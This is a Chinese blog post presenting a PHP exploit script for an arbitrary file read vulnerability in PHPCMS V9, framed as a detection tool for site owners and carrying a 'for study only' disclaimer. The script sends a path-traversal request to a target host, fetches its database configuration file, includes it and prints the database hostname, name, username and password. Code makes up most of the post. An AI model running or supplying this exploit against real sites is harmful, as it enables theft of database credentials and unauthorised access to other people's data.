phpcmsV9任意读文件漏洞利用工具
- 发表于
- Vulndb
注意:本程序带有攻击性,仅供学习研究请勿当作非法工具使用,否则后果自负,于本人无关!
睡觉前去论坛上面看了下,爆出 phpcmsV9最新任意读文件漏洞 ,第一反映就是
完了,估计互联网上又不知道多少万用户数据被脱了~~
自己就写了一个此漏洞的检测工具方便站长们检测自己的站点是否存在漏洞。
代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
<?php /** * PHPcms V9 任意文件读取漏洞检测工具 * @author Return Blog: www.uedbox.com * * 注意本程序仅供学习参考,不得用于非法互动 * 否则后果自负,与本人无关! */ function showInfo() { print ' *********************************************** * PHPcmsV9 Read All File ExpTool By: Return * * Blog: www.creturn.com * * Email:master@creturn.com * * Example: php exp.php wwww.phpcms.cn *********************************************** '; } $exp = '/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php'; //file_get_contents(''.$exp); if(count($argv) < 2){ showInfo(); }else{ $exp = 'http://'.$argv[1].$exp; $data = @file_get_contents($exp); @file_put_contents('expDatabase.php', $data); if(strstr($data,'<html>')){ showInfo(); echo 'Not found !'; exit(); }; $database = include 'expDatabase.php'; showInfo(); $out = 'HostName: '.$database['default']['hostname']."n"; $out .='DataBase:'. $database['default']['database']."n"; $out .='UserName:'. $database['default']['username']."n"; $out .='Password:'. $database['default']['password']."n"; if(!empty($database)){ echo "Found it! :nn"; echo $out; } @unlink('expDatabase.php'); } |
原文连接:phpcmsV9任意读文件漏洞利用工具
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。